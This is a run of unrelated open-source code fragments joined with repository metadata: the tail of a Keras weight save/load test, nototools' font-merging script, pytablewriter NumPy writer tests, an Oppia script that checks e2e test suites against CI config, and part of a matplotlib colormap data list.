model.save_weights(prefix, save_format='tensorflow', overwrite=False)
def test_no_default_session(self):
with ops.Graph().as_default():
self.assertFalse(ops.get_default_session())
data = np.random.random((1000, 32)).astype(np.float32)
labels = np.random.random((1000, 10)).astype(np.float32)
model = keras.models.Sequential([
keras.layers.Dense(10, activation='softmax'),
keras.layers.Dense(10, activation='softmax')])
model.compile(optimizer=training_module.RMSPropOptimizer(0.001),
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels)
fname = os.path.join(self.get_temp_dir(), 'weights', 'ckpt')
model.save_weights(fname)
model.load_weights(fname)
def test_no_graph_pollution(self):
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.session(graph) as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
model(x) # pylint: disable=not-callable
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
op_count = len(graph.get_operations())
model.save_weights(prefix, save_format='tensorflow')
self.assertEqual(len(graph.get_operations()), op_count)
model.load_weights(prefix)
op_count = len(graph.get_operations())
model.load_weights(prefix)
self.assertEqual(len(graph.get_operations()), op_count)
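# Helper: train a model briefly, save its weights, randomize its variables,
# then check that load_weights restores the predictions recorded at save time,
# both on the original model and on a freshly built one (restore-on-create).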
def _weight_loading_test_template(self, make_model_fn):
with self.cached_session():
model = make_model_fn()
model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
train_x = np.random.random((3, 2))
train_y = np.random.random((3,))
x = constant_op.constant(train_x, dtype=dtypes.float32)
model.train_on_batch(train_x, train_y)
model.save_weights(prefix, save_format='tf')
ref_y_before_train = model.predict(train_x)
model.train_on_batch(train_x, train_y)
ref_y_after_train = model.predict(train_x)
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
model.load_weights(prefix)
self.assertAllClose(ref_y_before_train, self.evaluate(model(x)))
# Test restore-on-create if this is a subclassed Model (graph Networks
# will have already created their variables).
load_model = make_model_fn()
load_model.load_weights(prefix)
self.assertAllClose(
ref_y_before_train,
self.evaluate(load_model(x)))
load_model = make_model_fn()
load_model.load_weights(prefix)
# We need to run some of the restore ops for predict(), but not all
# variables have been created yet (optimizer slot variables). Tests
# incremental restore.
load_model.predict(train_x)
load_model.compile(
loss='mse',
optimizer=training_module.RMSPropOptimizer(0.1),
metrics=['acc', keras.metrics.CategoricalAccuracy()])
load_model.train_on_batch(train_x, train_y)
self.assertAllClose(ref_y_after_train, self.evaluate(load_model(x)))
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model(self):
def _make_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
return keras.models.Model(a, b)
self._weight_loading_test_template(_make_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model(self):
self._weight_loading_test_template(SubclassedModel)
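# Helper: save weights from first_model_fn's model, load them into the model
# built by second_model_fn (which adds a layer), then round-trip that
# checkpoint back into the original model and verify its outputs are unchanged.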
def _new_layer_weight_loading_test_template(
self, first_model_fn, second_model_fn):
with self.cached_session() as session:
model = first_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
model.save_weights(prefix)
self.assertEqual(
prefix,
checkpoint_management.latest_checkpoint(temp_dir))
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
second_model = second_model_fn()
status = second_model.load_weights(prefix)
second_model(x)
status.run_restore_ops()
second_model.save_weights(prefix)
# Check that the second model's checkpoint loads into the original model
status = model.load_weights(prefix)
status.run_restore_ops(session)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dense(1, name='second')(x)
b = keras.layers.Dense(3, name='secondjr')(y)
return keras.models.Model(a, b)
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_no_weight_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
y = keras.layers.Dropout(rate=0.1)(b)
return keras.models.Model(a, y)
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model_added_layer(self):
class SubclassedModelRestore(training.Model):
def __init__(self):
super(SubclassedModelRestore, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.y_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.y_layer(self.x_layer(a)))
self._new_layer_weight_loading_test_template(
SubclassedModel, SubclassedModelRestore)
@test_util.run_in_graph_and_eager_modes
def test_incompatible_checkpoint(self):
save_path = trackable.Checkpoint().save(
os.path.join(self.get_temp_dir(), 'ckpt'))
m = keras.Model()
with self.assertRaisesRegexp(AssertionError, 'Nothing to load'):
m.load_weights(save_path)
m.dense = keras.layers.Dense(2)
m.dense(constant_op.constant([[1.]]))
with self.assertRaisesRegexp(
AssertionError, 'Nothing except the root object matched'):
m.load_weights(save_path)
@test_util.run_in_graph_and_eager_modes
def test_directory_passed(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'ckpt/')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_relative_path(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
os.chdir(self.get_temp_dir())
prefix = 'ackpt'
self.evaluate(v.assign(42.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt.index'))
self.evaluate(v.assign(1.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
prefix = 'subdir/ackpt'
self.evaluate(v.assign(43.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('subdir/ackpt.index'))
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(43., self.evaluate(v))
prefix = 'ackpt/'
self.evaluate(v.assign(44.))
m.save_weights(prefix)
self.assertTrue(file_io.file_exists('ackpt/.index'))
self.evaluate(v.assign(3.))
m.load_weights(prefix)
self.assertEqual(44., self.evaluate(v))
@test_util.run_in_graph_and_eager_modes
def test_nonexistent_prefix_directory(self):
m = keras.Model()
v = m.add_weight(name='v', shape=[])
self.evaluate(v.assign(42.))
prefix = os.path.join(self.get_temp_dir(), '{}'.format(ops.uid()), 'bckpt')
m.save_weights(prefix)
self.evaluate(v.assign(2.))
m.load_weights(prefix)
self.assertEqual(42., self.evaluate(v))
if __name__ == '__main__':
test.main()
|
apache-2.0
| 7,052,613,163,125,570,000 | 36.661588 | 80 | 0.630632 | false |
dougfelt/nototools
|
nototools/merge_fonts.py
|
1
|
6510
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Merges fonts.
Two notable differences between merge_noto and this script are:
1. merge_noto merges all fonts in Noto, or a subset of Noto clustered by
region, while this script merges a selected subset of fonts.
2. The line metrics in the final merged font are substituted by those in
NotoSans-Regular.ttf (LGC). This is to optimize the user experience in LGC.
The drawback is that some tall scripts in the file list (like Balinese,
Cuneiform, Javanese) might vertically overlap with each other and also be
clipped by the edge of the UI. This should be handled carefully by the UI
designer, say by changing the line height or adding margins.
Sample Usage:
$ merge_fonts.py -d noto-fonts/unhinted -o NotoSansMerged-Regular.ttf
"""
import sys
import os.path
import logging
from argparse import ArgumentParser
from fontTools import ttLib
from fontTools import merge
from merge_noto import add_gsub_to_font, has_gsub_table
from nototools.substitute_linemetrics import read_line_metrics, set_line_metrics
from fontTools.misc.loggingTools import Timer
log = logging.getLogger("nototools.merge_fonts")
# directory that contains the files to be merged
directory = ''
# file names to be merged
files = [
# It's recommended to put NotoSans-Regular.ttf as the first element in the
# list to maximize the amount of meta data retained in the final merged font.
'NotoSans-Regular.ttf',
'NotoSansAvestan-Regular.ttf',
'NotoSansBalinese-Regular.ttf',
'NotoSansBamum-Regular.ttf',
'NotoSansBatak-Regular.ttf',
'NotoSansBrahmi-Regular.ttf',
'NotoSansBuginese-Regular.ttf',
'NotoSansBuhid-Regular.ttf',
'NotoSansCarian-Regular.ttf',
'NotoSansCoptic-Regular.ttf',
'NotoSansCuneiform-Regular.ttf',
'NotoSansCypriot-Regular.ttf',
'NotoSansEgyptianHieroglyphs-Regular.ttf',
'NotoSansGlagolitic-Regular.ttf',
'NotoSansGothic-Regular.ttf',
'NotoSansHanunoo-Regular.ttf',
'NotoSansImperialAramaic-Regular.ttf',
'NotoSansInscriptionalPahlavi-Regular.ttf',
'NotoSansInscriptionalParthian-Regular.ttf',
'NotoSansJavanese-Regular.ttf',
'NotoSansKaithi-Regular.ttf',
'NotoSansKayahLi-Regular.ttf',
'NotoSansKharoshthi-Regular.ttf',
'NotoSansLepcha-Regular.ttf',
'NotoSansLimbu-Regular.ttf',
'NotoSansLinearB-Regular.ttf',
'NotoSansLisu-Regular.ttf',
'NotoSansLycian-Regular.ttf',
'NotoSansLydian-Regular.ttf',
'NotoSansMandaic-Regular.ttf',
'NotoSansMeeteiMayek-Regular.ttf',
'NotoSansMongolian-Regular.ttf',
'NotoSansNKo-Regular.ttf',
'NotoSansNewTaiLue-Regular.ttf',
'NotoSansOgham-Regular.ttf',
'NotoSansOlChiki-Regular.ttf',
'NotoSansOldItalic-Regular.ttf',
'NotoSansOldPersian-Regular.ttf',
'NotoSansOldSouthArabian-Regular.ttf',
'NotoSansOldTurkic-Regular.ttf',
'NotoSansOsmanya-Regular.ttf',
'NotoSansPhagsPa-Regular.ttf',
'NotoSansPhoenician-Regular.ttf',
'NotoSansRejang-Regular.ttf',
'NotoSansRunic-Regular.ttf',
'NotoSansSamaritan-Regular.ttf',
'NotoSansSaurashtra-Regular.ttf',
'NotoSansShavian-Regular.ttf',
'NotoSansSundanese-Regular.ttf',
'NotoSansSylotiNagri-Regular.ttf',
'NotoSansSyriacEastern-Regular.ttf',
'NotoSansTagalog-Regular.ttf',
'NotoSansTagbanwa-Regular.ttf',
'NotoSansTaiLe-Regular.ttf',
'NotoSansTaiTham-Regular.ttf',
'NotoSansTaiViet-Regular.ttf',
'NotoSansThaana-Regular.ttf',
'NotoSansTifinagh-Regular.ttf',
'NotoSansUgaritic-Regular.ttf',
'NotoSansVai-Regular.ttf',
'NotoSansYi-Regular.ttf',
'NotoSansCham-Regular.ttf',
]
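# Filters `files` down to the entries that actually exist under `directory`,
# returning them as directory-prefixed paths and warning about any that are
# missing.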
def build_valid_filenames(files=files, directory=directory):
files = list(files)
directory = directory.rstrip('/')
if directory == '' or directory is None:
directory = '.'
valid_files = []
for f in files:
valid_file = directory + '/' + f
if not os.path.isfile(valid_file):
log.warn('can not find %s, skipping it.' % valid_file)
else:
valid_files.append(valid_file)
if len(valid_files) == 0:
return valid_files
if os.path.basename(valid_files[0]) != files[0]:
log.warn('cannot find the font %s to read line metrics from. Line '
'metrics in the result might be wrong.', files[0])
return valid_files
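# Merges every available font under --directory into a single TTF, copying the
# line metrics of the first font in `files` (NotoSans-Regular) into the result.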
def main():
t = Timer()
parser = ArgumentParser()
parser.add_argument('-d', '--directory', default='./',
help='Path to directory containing the fonts')
parser.add_argument('-o', '--output', default='merged.ttf',
help='Path to output file.')
parser.add_argument('-v', '--verbose', action='store_true',
help='Verbose mode, printing out more info')
args = parser.parse_args()
logging.basicConfig(level=logging.INFO if args.verbose else logging.WARNING)
valid_files = build_valid_filenames(directory=args.directory)
if len(valid_files) <= 1:
log.warn('expecting at least two fonts to merge, but only got %d '
+ 'font(s).', len(valid_files))
sys.exit(-1)
for idx, file in enumerate(valid_files):
if not has_gsub_table(file):
log.info('adding default GSUB table to %s.' % file)
valid_files[idx] = add_gsub_to_font(file)
merger = merge.Merger()
print('Merging %d Fonts...' % len(valid_files))
font = merger.merge(valid_files)
# Use the line metric in the first font to replace the one in final result.
metrics = read_line_metrics(ttLib.TTFont(valid_files[0]))
set_line_metrics(font, metrics)
font.save(args.output)
font.close()
print('%d fonts are merged. %d fonts are skipped. Cost %0.3f s.' % (len(valid_files), len(files) - len(valid_files), t.time()))
print('Please check the result at %s.' % os.path.abspath(
os.path.realpath(args.output)))
if __name__ == '__main__':
main()
|
apache-2.0
| -1,896,441,785,038,470,700 | 35.166667 | 131 | 0.697389 | false |
thombashi/pytablewriter
|
test/writer/text/sourcecode/test_numpy_writer.py
|
1
|
6388
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import pytest
import pytablewriter as ptw
from ...._common import print_test_result
from ....data import (
Data,
headers,
mix_header_list,
mix_value_matrix,
null_test_data_list,
value_matrix,
value_matrix_iter,
value_matrix_with_none,
)
try:
import numpy as np # noqa: W0611
SKIP_DATAFRAME_TEST = False
except ImportError:
SKIP_DATAFRAME_TEST = True
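# Each Data entry pairs a writer configuration (table name, indent level,
# headers and value matrix) with the NumPy source code the writer is expected
# to emit for it.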
normal_test_data_list = [
Data(
table="table-name ho'ge",
indent=0,
header=headers,
value=value_matrix,
expected="""table_name_ho_ge = np.array([
["a", "b", "c", "dd", "e"],
[1, 123.1, "a", 1, 1],
[2, 2.2, "bb", 2.2, 2.2],
[3, 3.3, "ccc", 3, "cccc"],
])
""",
),
Data(
table="empty value",
indent=0,
header=headers,
value=None,
expected="""empty_value = np.array([
["a", "b", "c", "dd", "e"],
])
""",
),
Data(
table="table with%null-value",
indent=0,
header=headers,
value=value_matrix_with_none,
expected="""table_with_null_value = np.array([
["a", "b", "c", "dd", "e"],
[1, None, "a", 1, None],
[None, 2.2, None, 2.2, 2.2],
[3, 3.3, "ccc", None, "cccc"],
[None, None, None, None, None],
])
""",
),
Data(
table="mix data types",
indent=0,
header=mix_header_list,
value=mix_value_matrix,
expected="""mix_data_types = np.array([
["i", "f", "c", "if", "ifc", "bool", "inf", "nan", "mix_num", "time"],
[1, 1.1, "aa", 1, 1, True, np.inf, np.nan, 1, dateutil.parser.parse("2017-01-01T00:00:00")],
[2, 2.2, "bbb", 2.2, 2.2, False, np.inf, np.nan, np.inf, "2017-01-02 03:04:05+09:00"],
[3, 3.33, "cccc", -3, "ccc", True, np.inf, np.nan, np.nan, dateutil.parser.parse("2017-01-01T00:00:00")],
])
""",
),
Data(
table="mix data types wo header",
indent=0,
header=None,
value=mix_value_matrix,
expected="""mix_data_types_wo_header = np.array([
[1, 1.1, "aa", 1, 1, True, np.inf, np.nan, 1, dateutil.parser.parse("2017-01-01T00:00:00")],
[2, 2.2, "bbb", 2.2, 2.2, False, np.inf, np.nan, np.inf, "2017-01-02 03:04:05+09:00"],
[3, 3.33, "cccc", -3, "ccc", True, np.inf, np.nan, np.nan, dateutil.parser.parse("2017-01-01T00:00:00")],
])
""",
),
Data(
table="float-with-null",
indent=0,
header=["a", "b"],
value=[
["0.03785679191278808", "826.21158713263"],
[None, "826.21158713263"],
[0.1, "1.0499675627886724"],
],
expected="""float_with_null = np.array([
["a", "b"],
[0.03785679191278808, 826.21158713263],
[None, 826.21158713263],
[0.1, 1.0499675627886724],
])
""",
),
]
table_writer_class = ptw.NumpyTableWriter
class Test_NumpyTableWriter_write_new_line:
def test_normal(self, capsys):
writer = table_writer_class()
writer.write_null_line()
out, _err = capsys.readouterr()
assert out == "\n"
class Test_NumpyTableWriter_write_table:
@pytest.mark.parametrize(
["table", "indent", "header", "value", "expected"],
[
[data.table, data.indent, data.header, data.value, data.expected]
for data in normal_test_data_list
],
)
def test_normal(self, capsys, table, indent, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.set_indent_level(indent)
writer.headers = header
writer.value_matrix = value
writer.write_table()
out, err = capsys.readouterr()
print_test_result(expected=expected, actual=out, error=err)
assert out == expected
@pytest.mark.parametrize(
["table", "indent", "header", "value", "expected"],
[
[data.table, data.indent, data.header, data.value, data.expected]
for data in null_test_data_list
],
)
def test_exception_null(self, table, indent, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.set_indent_level(indent)
writer.headers = header
writer.value_matrix = value
assert writer.dumps() == ""
@pytest.mark.parametrize(
["table", "indent", "header", "value", "expected"],
[
[data.table, data.indent, data.header, data.value, data.expected]
for data in [
Data(
table=None,
indent=0,
header=headers,
value=value_matrix,
expected="",
)
]
],
)
def test_exception(self, table, indent, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.set_indent_level(indent)
writer.headers = header
writer.value_matrix = value
with pytest.raises(ptw.EmptyTableNameError):
writer.write_table()
class Test_NumpyTableWriter_write_table_iter:
@pytest.mark.parametrize(
["table", "header", "value", "expected"],
[
[
"tablename",
["ha", "hb", "hc"],
value_matrix_iter,
"""tablename = np.array([
["ha", "hb", "hc"],
[1, 2, 3],
[11, 12, 13],
[1, 2, 3],
[11, 12, 13],
[101, 102, 103],
[1001, 1002, 1003],
])
""",
]
],
)
def test_normal(self, capsys, table, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.headers = header
writer.value_matrix = value
writer.iteration_length = len(value)
writer.write_table_iter()
out, _err = capsys.readouterr()
assert out == expected
@pytest.mark.parametrize(
["table", "header", "value", "expected"],
[[data.table, data.header, data.value, data.expected] for data in null_test_data_list],
)
def test_normal_empty(self, table, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.headers = header
writer.value_matrix = value
writer.write_table_iter()
|
mit
| 4,589,981,548,541,643,000 | 26.534483 | 109 | 0.533187 | false |
prasanna08/oppia
|
scripts/check_e2e_tests_are_captured_in_ci.py
|
1
|
8956
|
# Copyright 2020 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A script to check that travis.yml file & protractor.conf.js have the
same e2e test suites.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import os
import re
import python_utils
import utils
# These test suites are not run on Travis CI.
# One is extra (i.e. (full: [*.js])) and the remaining suites are run by
# CircleCI.
TEST_SUITES_NOT_RUN_ON_TRAVIS = [
'full', 'accessibility', 'adminPage', 'classroomPage',
'classroomPageFileUploadFeatures', 'collections', 'contributorDashboard',
'fileUploadExtensions', 'fileUploadFeatures', 'library', 'navigation',
'playVoiceovers', 'preferences', 'profileFeatures', 'profileMenu',
'publication', 'subscriptions', 'topicsAndSkillsDashboard',
'topicAndStoryEditor', 'topicAndStoryEditorFileUploadFeatures', 'users']
TRAVIS_CI_FILE_PATH = os.path.join(os.getcwd(), '.travis.yml')
PROTRACTOR_CONF_FILE_PATH = os.path.join(
os.getcwd(), 'core', 'tests', 'protractor.conf.js')
SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST = 'coreEditorAndPlayerFeatures'
def get_e2e_suite_names_from_jobs_travis_yml_file():
"""Extracts the test suites from env/jobs section from
the .travis.yml file.
Returns:
list(str). An alphabetically-sorted list of names of test suites
from the jobs section in the .travis.yml file.
"""
travis_file_content = read_and_parse_travis_yml_file()
jobs_str = python_utils.convert_to_bytes(travis_file_content['env']['jobs'])
suites_from_jobs = []
# The following line extracts the test suite name from the jobs section
# that is in the form RUN_E2E_TESTS_ACCESSIBILITY=true.
test_regex = re.compile(r'RUN_E2E_TESTS_([A-Z_]*)=')
jobs = test_regex.findall(jobs_str)
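# e.g. an entry like RUN_E2E_TESTS_TOPICS_AND_SKILLS_DASHBOARD=true is captured
# as 'TOPICS_AND_SKILLS_DASHBOARD' and converted to 'topicsAndSkillsDashboard'.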
for job in jobs:
suites_from_jobs.append(
utils.snake_case_to_camel_case(job.lower()))
return sorted(suites_from_jobs)
def get_e2e_suite_names_from_script_travis_yml_file():
"""Extracts the script section from the .travis.yml file.
Returns:
list(str). An alphabetically-sorted list of names of test suites
from the script section in the .travis.yml file.
"""
travis_file_content = read_and_parse_travis_yml_file()
script_str = python_utils.convert_to_bytes(travis_file_content['script'])
# The following line extracts the test suites from patterns like
# python -m scripts.run_e2e_tests --suite="accessibility".
e2e_test_suite_regex = re.compile(r'--suite="([a-zA-Z_-]*)"')
suites_list = e2e_test_suite_regex.findall(script_str)
return sorted(suites_list)
def get_e2e_suite_names_from_protractor_file():
"""Extracts the test suites section from the protractor.conf.js file.
Returns:
list(str). An alphabetically-sorted list of names of test suites
from the protractor.conf.js file.
"""
protractor_config_file_content = read_protractor_conf_file()
# The following line extracts suite object from protractor.conf.js.
suite_object_string = re.compile(
r'suites = {([^}]+)}').findall(protractor_config_file_content)[0]
# The following line extracts the keys/test suites from the "key: value"
# pair from the suites object.
key_regex = re.compile(r'\b([a-zA-Z_-]*):')
protractor_suites = key_regex.findall(suite_object_string)
return sorted(protractor_suites)
def read_protractor_conf_file():
"""Returns the contents of core/tests/protractor.conf.js file.
Returns:
str. The contents of protractor.conf.js, as a string.
"""
protractor_config_file_content = python_utils.open_file(
PROTRACTOR_CONF_FILE_PATH, 'r').read()
return protractor_config_file_content
def read_and_parse_travis_yml_file():
"""Returns the contents of .travis.yml, as a dict.
Returns:
dict. Contents of the .travis.yml file parsed as a dict.
"""
travis_ci_file_content = python_utils.open_file(
TRAVIS_CI_FILE_PATH, 'r').read()
travis_ci_dict = utils.dict_from_yaml(travis_ci_file_content)
return travis_ci_dict
def get_e2e_test_filenames_from_protractor_dir():
"""Extracts the names of the all test files in core/tests/protractor
and core/tests/protractor_desktop directory.
Returns:
list(str). An alphabetically-sorted list of of the all test files
in core/tests/protractor and core/tests/protractor_desktop directory.
"""
protractor_test_suite_files = []
protractor_files = os.path.join(
os.getcwd(), 'core', 'tests', 'protractor')
protractor_desktop_files = os.path.join(
os.getcwd(), 'core', 'tests', 'protractor_desktop')
for file_name in os.listdir(protractor_files):
protractor_test_suite_files.append(file_name)
for file_name in os.listdir(protractor_desktop_files):
protractor_test_suite_files.append(file_name)
return sorted(protractor_test_suite_files)
def get_e2e_test_filenames_from_protractor_conf_file():
"""Extracts the filenames from the suites object of
protractor.conf.js file.
Returns:
list(str). An alphabetically-sorted list of filenames extracted
from the protractor.conf.js file.
"""
protractor_config_file_content = read_protractor_conf_file()
# The following line extracts suite object from protractor.conf.js.
suite_object_string = re.compile(
r'suites = {([^}]+)}').findall(protractor_config_file_content)[0]
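# The following regex pulls just the file names out of the suite paths,
# e.g. 'protractor_desktop/accessibility.js' yields 'accessibility.js'.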
test_files_regex = re.compile(r'/([a-zA-Z]*.js)')
e2e_test_files = test_files_regex.findall(suite_object_string)
return sorted(e2e_test_files)
def main():
"""Test the travis ci file and protractor.conf.js to have same
e2e test suites.
"""
python_utils.PRINT(
'Checking all e2e test files are captured '
'in protractor.conf.js...')
protractor_test_suite_files = get_e2e_test_filenames_from_protractor_dir()
protractor_conf_test_suites = (
get_e2e_test_filenames_from_protractor_conf_file())
if protractor_test_suite_files != protractor_conf_test_suites:
raise Exception(
'One or more test files from the protractor or protractor_desktop '
'directory are missing from protractor.conf.js')
python_utils.PRINT('Done!')
python_utils.PRINT('Checking e2e tests are captured in .travis.yml...')
protractor_test_suites = get_e2e_suite_names_from_protractor_file()
travis_e2e_suites = get_e2e_suite_names_from_jobs_travis_yml_file()
travis_e2e_scripts = get_e2e_suite_names_from_script_travis_yml_file()
for excluded_test in TEST_SUITES_NOT_RUN_ON_TRAVIS:
protractor_test_suites.remove(excluded_test)
if not travis_e2e_suites:
raise Exception(
'The e2e test suites that have been extracted from '
'jobs section from travis.ci are empty.')
if not travis_e2e_scripts:
raise Exception(
'The e2e test suites that have been extracted from '
'script section from travis.ci are empty.')
if not protractor_test_suites:
raise Exception(
'The e2e test suites that have been extracted from '
'protractor.conf.js are empty.')
if SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST not in travis_e2e_scripts:
raise Exception(
'{} is expected to be in the e2e test suites '
'extracted from the script section of .travis.yml '
'file, but it is missing.'
.format(SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST))
if SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST not in protractor_test_suites:
raise Exception(
'{} is expected to be in the e2e test suites '
'extracted from the protractor.conf.js file, '
'but it is missing.'
.format(SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST))
if protractor_test_suites != travis_e2e_scripts:
raise Exception(
'Protractor test suites and Travis Ci test suites are not in sync.')
python_utils.PRINT('Done!')
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when check_e2e_tests_are_captured_in_ci.py
# is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
apache-2.0
| -971,472,052,565,327,900 | 38.10917 | 80 | 0.682671 | false |
planetarymike/IDL-Colorbars
|
IDL_py_test/027_Eos_B.py
|
1
|
5942
|
from matplotlib.colors import LinearSegmentedColormap
from numpy import nan, inf
cm_data = [[1., 1., 1.],
[1., 1., 1.],
[0.498039, 0.498039, 0.498039],
[0., 0., 0.513725],
[0., 0., 0.533333],
[0., 0., 0.54902],
[0., 0., 0.564706],
[0., 0., 0.580392],
[0., 0., 0.6],
[0., 0., 0.615686],
[0., 0., 0.568627],
[0., 0., 0.584314],
[0., 0., 0.666667],
[0., 0., 0.682353],
[0., 0., 0.698039],
[0., 0., 0.713725],
[0., 0., 0.733333],
[0., 0., 0.74902],
[0., 0., 0.764706],
[0., 0., 0.780392],
[0., 0., 0.717647],
[0., 0., 0.733333],
[0., 0., 0.831373],
[0., 0., 0.847059],
[0., 0., 0.866667],
[0., 0., 0.882353],
[0., 0., 0.898039],
[0., 0., 0.913725],
[0., 0., 0.933333],
[0., 0., 0.94902],
[0., 0., 0.866667],
[0., 0., 0.882353],
[0., 0., 1.],
[0., 0.027451, 0.968627],
[0., 0.0588235, 0.937255],
[0., 0.0901961, 0.905882],
[0., 0.121569, 0.87451],
[0., 0.152941, 0.843137],
[0., 0.184314, 0.811765],
[0., 0.215686, 0.780392],
[0., 0.223529, 0.67451],
[0., 0.25098, 0.643137],
[0., 0.309804, 0.686275],
[0., 0.341176, 0.654902],
[0., 0.372549, 0.623529],
[0., 0.403922, 0.592157],
[0., 0.435294, 0.560784],
[0., 0.466667, 0.529412],
[0., 0.498039, 0.498039],
[0., 0.529412, 0.466667],
[0., 0.505882, 0.392157],
[0., 0.533333, 0.364706],
[0., 0.623529, 0.372549],
[0., 0.654902, 0.341176],
[0., 0.686275, 0.309804],
[0., 0.717647, 0.278431],
[0., 0.74902, 0.247059],
[0., 0.780392, 0.215686],
[0., 0.811765, 0.184314],
[0., 0.843137, 0.152941],
[0., 0.784314, 0.109804],
[0., 0.811765, 0.0823529],
[0., 0.937255, 0.0588235],
[0., 0.968627, 0.027451],
[0., 1., 0.],
[0.0352941, 1., 0.],
[0.0705882, 1., 0.],
[0.105882, 1., 0.],
[0.141176, 1., 0.],
[0.176471, 1., 0.],
[0.192157, 0.898039, 0.],
[0.223529, 0.898039, 0.],
[0.282353, 1., 0.],
[0.317647, 1., 0.],
[0.356863, 1., 0.],
[0.392157, 1., 0.],
[0.427451, 1., 0.],
[0.462745, 1., 0.],
[0.498039, 1., 0.],
[0.533333, 1., 0.],
[0.513725, 0.898039, 0.],
[0.545098, 0.898039, 0.],
[0.639216, 1., 0.],
[0.678431, 1., 0.],
[0.713725, 1., 0.],
[0.74902, 1., 0.],
[0.784314, 1., 0.],
[0.819608, 1., 0.],
[0.854902, 1., 0.],
[0.890196, 1., 0.],
[0.835294, 0.898039, 0.],
[0.866667, 0.898039, 0.],
[1., 1., 0.],
[1., 0.980392, 0.],
[1., 0.964706, 0.],
[1., 0.94902, 0.],
[1., 0.933333, 0.],
[1., 0.913725, 0.],
[1., 0.898039, 0.],
[1., 0.882353, 0.],
[0.898039, 0.776471, 0.],
[0.898039, 0.764706, 0.],
[1., 0.831373, 0.],
[1., 0.815686, 0.],
[1., 0.8, 0.],
[1., 0.780392, 0.],
[1., 0.764706, 0.],
[1., 0.74902, 0.],
[1., 0.733333, 0.],
